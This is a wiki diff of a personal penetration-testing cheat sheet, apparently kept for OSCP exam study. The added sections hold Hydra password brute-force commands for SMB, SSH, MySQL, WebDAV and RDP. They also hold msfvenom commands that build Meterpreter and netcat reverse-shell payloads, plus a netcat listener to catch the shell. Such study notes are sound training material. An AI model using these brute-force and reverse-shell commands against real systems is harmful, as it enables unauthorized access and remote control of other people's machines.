Differences

This shows you the differences between two versions of the page.

--- cheat_sheets_various [2024/02/04 02:33] – [Hydra] gman
+++ cheat_sheets_various [2024/02/04 03:05] (current) – [net commands (Windows)] gman
@@ Line 143: / Line 143: @@
 ===== Hydra =====
-Hydra: our versatile brute-forcing tool...
+Hydra is extremely functional for brute-forcing MULTIPLE different protocols.
-  * Hydra is extremely functional for brute-forcing MULTIPLE different protocols.
+  * [[https://rodtrent.substack.com/p/using-kali-linux-and-hydra-for-attack | Usage & Examples]]
-  * [[Usage & Examples | https://rodtrent.substack.com/p/using-kali-linux-and-hydra-for-attack]]
 Specify a single username and single password to try (lower case ''l'' and ''p''):
@@ Line 159: / Line 158: @@
 </code>
-Options:
+**Options:**
   * ''-t 4'' : number of parallel connections per target
   * ''-l [user]'' : single username of the account we are trying to compromise
@@ Line 166: / Line 165: @@
   * ''-P [/path/to/]'' : plaintext file containing possible passwords
   * ''-vV'' : Very verbose: login+pass combo for each attempt
-  * ''[ftp | ssh | etc] : Sets the protocol (see "supported services" below)
+  * ''[ftp | ssh | etc]'' : Sets the protocol (see "supported services" below)
 Be very careful with your brute-force speed. You could crash the system or DoS it.
@@ Line 173: / Line 172: @@
   * Hydra actually recommends ''-t 1'' through ''-t 4''.
-**Supported services:** adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
+**SMB:**
+<code>
+hydra -l admin -P /usr/share/wordlists/rockyou.txt [target IP] smb
+</code>
+**SSH:**
+<code>
+hydra -l student -P rockyou.txt [ip] ssh
+</code>
+**MySQL:**
+<code>
+hydra -l root -P /usr/share/metasploit_framework/data/wordlists/unix_passwords.txt [target ip] mysql
+</code>
+**WebDAV (http login):**
+<code>
+hydra -L /.../common-users.txt -P  /.../common-passwords.txt [target ip] http-get /webdav/
+# http-get : Indicates the protocol to be used
+# /webdav/ : Indicates the directory where hydra can find the authentication mechanism
+</code>
+**RDP:**
+<code>
+hydra -L users.txt -P passwords.txt [target ip] rdp -s 3333
+# -s : service port (if different than the default)
+</code>
+**Supported services:**
+  * adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird
+  * **ftp[s]**
+  * http[s]-{head|get|post}
+  * http[s]-{get|post}-form
+  * http-proxy http-proxy-urlenum
+  * icq imap[s] irc
+  * ldap2[s] ldap3[-{cram|digest}md5][s]
+  * memcached mongodb mssql mysql nntp
+  * oracle-listener oracle-sid
+  * pcanywhere pcnfs pop3[s] postgres
+  * radmin2 **rdp** redis rexec rlogin rpcap rsh rtsp
+  * s7-300 sip **smb** smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak
+  * telnet[s] vmauthd vnc xmpp
@@ Line 277: / Line 322: @@
 ===== msfvenom =====
-==== Reverse Shell Payload ====
+To see the available payloads: ''msfvenom -l payloads'' (filter by piping to grep)
+  * [[https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ | Cheat Sheet]]
-To generate a reverse shell payload:
+First, build a payload with MSFVenom (e.g., a reverse shell payload):
 <code>
-msfvenom -p cmd/unix/reverse_netcat lhost=[local ip] lport=4444 R
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[local ip] LPORT=1234 -f exe > payload.exe
+msfvenom -p cmd/unix/reverse_netcat LHOST=[local ip] LPORT=4444 R
 #
 # -p    = payload
-# lhost = our local host IP address (this is your machine's IP address)
+# LHOST = local host IP address (this is your machine's IP address)
-# lport = the port to listen on (this is the port on your machine)
+# LPORT = local port to listen on (this is the port on your machine)
+# -f    = format (of the output)
 # R     = export the payload in raw format
 </code>
+A **staged** payload will follow this syntax (note the delimiter):
+  * ''windows/x64/meterpreter/reverse_tcp''
+  * ''linux/x86/meterpreter/reverse_tcp''
+A **non-staged** payload will follow this syntax:
+  * ''windows/x64/meterpreter_reverse_tcp''
+  * ''linux/x86/meterpreter_reverse_tcp''
 After that set up a listener on your attach machine:
-<code>nc -nvvlp [listening port]</code>
+<code>nc -nvlp [listening port]</code>
 Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine.
@@ Line 298: / Line 354: @@
 ----
-==== Notes ====
+===== net commands (Windows) =====
-**To-Do:** https://www.reddit.com/r/oscp/comments/ixmqp0/msfvenom/
+stuff
+
+----
-**Source:** https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
-**Advice:** I intend to use some features of Metasploit for as many machines as I want on the exam. You really owe it to yourself to read the oscp-exam-guide regarding msfvenom.
-**Additional:**
-  * msfvenom cheatsheet: https://netsec.ws/?p=331
-  * To see all available payloads: ''msfvenom -l payloads''
-----
 ===== ping =====